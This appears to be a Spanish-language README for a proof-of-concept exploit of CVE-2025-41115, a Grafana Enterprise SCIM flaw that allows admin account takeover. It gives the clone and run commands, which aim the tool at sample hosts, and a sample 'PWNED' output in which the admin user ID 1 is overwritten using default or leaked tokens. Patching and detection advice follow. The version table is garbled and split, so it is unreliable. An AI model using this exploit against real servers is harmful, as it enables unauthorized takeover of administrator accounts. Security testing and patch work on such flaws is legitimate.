
CVE-2025-41115

Vulnerabilidad crítica de escalada de privilegios en SCIM de Grafana Enterprise
CVE-2025-41115 es una vulnerabilidad Crítica (CVSS 10.0) en Grafana Enterprise que afecta a su función de aprovisionamiento de usuarios SCIM.
Cuando el aprovisionamiento SCIM está habilitado y user_sync_enabled = true, un cliente SCIM malicioso puede enviar un externalId numérico, que Grafana asigna erróneamente a un ID de usuario interno, lo que permite a un atacante suplantar o sobrescribir cuentas existentes, incluidas las de administradores.
⚠️ Grafana OSS NO está afectado.
Condiciones necesarias para la explotación:
enableSCIM = true[auth.scim] user_sync_enabled = true| Version | Estado |
|---|---|
| 12.0.0 → 12.2.1 | ❌ Vulnerable |
| 12.3.0 | ✅ Parcheado |
| 12.2.1 (compilación parcheada) | ✅ Parcheado |
| 12.1.3 |
💡 Los servicios de Grafana gestionados (AWS/Azure/Grafana Cloud) fueron parcheados por los proveedores.
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
o simplemente copia y pega el script anterior en un archivo
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com
Cuando el exploit realmente funciona (es decir, el objetivo es vulnerable y el token es válido), verás una salida exactamente como esta: texto
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
Actualiza a 12.3.0 o a una de las versiones de mantenimiento parcheadas.
Si no estás usando el aprovisionamiento SCIM, asegúrate de tener:
enableSCIM = false
o
[auth.scim]
user_sync_enabled = false
Busca:
externalId numéricoAsegúrate de que solo proveedores de identidad de confianza puedan comunicarse con tu endpoint SCIM.
Vigila inicios de sesión sospechosos, eventos de creación de usuarios o toma de control de administradores.
Este PoC es solo para pruebas de seguridad autorizadas y uso educativo en sistemas que posees o para los que tienes permiso escrito explícito para probar. El uso no autorizado es ilegal y puede dar lugar a un proceso penal. El autor y el distribuidor no asumen ninguna responsabilidad por el mal uso. Parchea inmediatamente (≥12.0.6 / 12.3.0+).
| ✅ Parcheado |
| 12.0.6 | ✅ Parcheado |